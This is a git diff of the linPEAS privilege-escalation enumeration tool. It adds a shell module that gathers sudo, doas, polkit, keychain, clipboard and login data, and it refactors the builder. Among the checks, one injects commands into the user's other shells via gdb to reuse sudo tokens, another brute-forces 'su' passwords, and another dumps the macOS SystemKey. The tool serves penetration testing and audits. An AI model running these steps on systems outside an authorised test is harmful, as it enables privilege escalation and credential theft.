"$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi +fi diff --git a/linPEAS/builder/linpeas_parts/users_information.sh b/linPEAS/builder/linpeas_parts/users_information.sh new file mode 100644 index 0000000..d0de135 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/users_information.sh @@ -0,0 +1,226 @@ +########################################### +#----------) Users Information (----------# +########################################### +print_title "Users Information" + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +print_2title "Clipboard or highlighted text?" +if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +else echo_not_found "xsel and xclip" +fi +echo "" + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," + fi +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break + fi + done + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" + +#-- UI) Doas +print_2title "Checking doas.conf" +doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) +if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," +else echo_not_found "doas.conf" +fi +echo "" + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" + fi + done + fi +fi +echo "" + +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" + +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" + fi + done +fi +echo "" + +#-- UI) Password policy +print_2title "Password policy" +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null + echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + echo "" +fi + +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC \ No newline at end of file diff --git a/linPEAS/builder/src/linpeasBaseBuilder.py b/linPEAS/builder/src/linpeasBaseBuilder.py new file mode 100644 index 0000000..b7a7ea2 --- /dev/null +++ b/linPEAS/builder/src/linpeasBaseBuilder.py @@ -0,0 +1,37 @@ +from .yamlGlobals import ( + LINPEAS_PARTS, + LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, + PEAS_CHECKS_MARKUP +) + +class LinpeasBaseBuilder: + def __init__(self): + with open(LINPEAS_BASE_PATH, 'r') as file: + self.linpeas_base = file.read() + + def build(self): + print("[+] Building temporary linpeas_base.sh...") + checks = [] + for part in LINPEAS_PARTS: + name = part["name"] + assert name, f"Name not found in {part}" + name_check = part["name_check"] + assert name_check, f"Name not found in {name_check}" + file_path = part["file_path"] + assert file_path, f"Name not found in {file_path}" + + with open(file_path, 'r') as file: + linpeas_part = file.read() + + checks.append(name_check) + self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check};\n" + self.linpeas_base += f'print_title "{name}"\n' + self.linpeas_base += linpeas_part + self.linpeas_base += f"\nfi\necho ''\necho ''\n" + self.linpeas_base += 'if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi\n' + + self.linpeas_base = self.linpeas_base.replace(PEAS_CHECKS_MARKUP, ",".join(checks)) + + with open(TEMPORARY_LINPEAS_BASE_PATH, "w") as f: + f.write(self.linpeas_base) diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 7880e48..2139467 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -1,12 +1,13 @@ import re import requests import base64 +import os from .peasLoaded import PEASLoaded from .peassRecord import PEASRecord from .fileRecord import FileRecord from .yamlGlobals import ( - LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, PEAS_FINDS_MARKUP, PEAS_STORAGES_MARKUP, PEAS_STORAGES_MARKUP, @@ -38,7 +39,7 @@ class LinpeasBuilder: self.bash_find_f_vars, self.bash_find_d_vars = set(), set() self.bash_storages = set() self.__get_files_to_search() - with open(LINPEAS_BASE_PATH, 'r') as file: + with open(TEMPORARY_LINPEAS_BASE_PATH, 'r') as file: self.linpeas_sh = file.read() def build(self): @@ -309,9 +310,13 @@ class LinpeasBuilder: def __replace_mark(self, mark: str, find_calls: list, join_char: str): """Substitude the markup with the actual code""" + self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed def write_linpeas(self, path): """Write on disk the final linpeas""" + with open(path, "w") as f: - f.write(self.linpeas_sh) \ No newline at end of file + f.write(self.linpeas_sh) + + os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file \ No newline at end of file diff --git a/linPEAS/builder/src/yamlGlobals.py b/linPEAS/builder/src/yamlGlobals.py index 8634b9c..3064a4f 100644 --- a/linPEAS/builder/src/yamlGlobals.py +++ b/linPEAS/builder/src/yamlGlobals.py @@ -2,7 +2,54 @@ import os import yaml CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) -LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" + +LINPEAS_BASE_PARTS = CURRENT_DIR + "/../linpeas_parts" +LINPEAS_PARTS = [ + { + "name": "System Information", + "name_check": "system_information", + "file_path": LINPEAS_BASE_PARTS + "/system_information.sh" + }, + { + "name": "Container", + "name_check": "container", + "file_path": LINPEAS_BASE_PARTS + "/container.sh" + }, + { + "name": "Available Software", + "name_check": "available_software", + "file_path": LINPEAS_BASE_PARTS + "/available_software.sh" + }, + { + "name": "Processes, Crons, Timers, Services and Sockets", + "name_check": "procs_crons_timers_srvcs_sockets", + "file_path": LINPEAS_BASE_PARTS + "/procs_crons_timers_srvcs_sockets.sh" + }, + { + "name": "Network Information", + "name_check": "network_information", + "file_path": LINPEAS_BASE_PARTS + "/network_information.sh" + }, + { + "name": "Users Information", + "name_check": "users_information", + "file_path": LINPEAS_BASE_PARTS + "/users_information.sh" + }, + { + "name": "Software Information", + "name_check": "software_information", + "file_path": LINPEAS_BASE_PARTS + "/software_information.sh" + }, + { + "name": "Interesting Files", + "name_check": "interesting_files", + "file_path": LINPEAS_BASE_PARTS + "/interesting_files.sh" + } +] + + +LINPEAS_BASE_PATH = LINPEAS_BASE_PARTS + "/linpeas_base.sh" +TEMPORARY_LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh" YAML_NAME = "sensitive_files.yaml" FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME @@ -18,6 +65,7 @@ assert all(f in ROOT_FOLDER for f in COMMON_FILE_FOLDERS) assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS) +PEAS_CHECKS_MARKUP = YAML_LOADED["peas_checks"] PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"] FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"] FIND_TEMPLATE = YAML_LOADED["find_template"] diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh index 56bdd0c..fc368bb 100755 --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -56,7 +56,7 @@ NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files" WAIT="" PASSWORD="" NOCOLOR="" @@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-N${BLUE} Do not use colours ${YELLOW}-v${BLUE} Verbose execution ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 @@ -365,8 +365,8 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$' -sidVB2='/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' +sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$' +sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" @@ -1086,144 +1086,145 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - 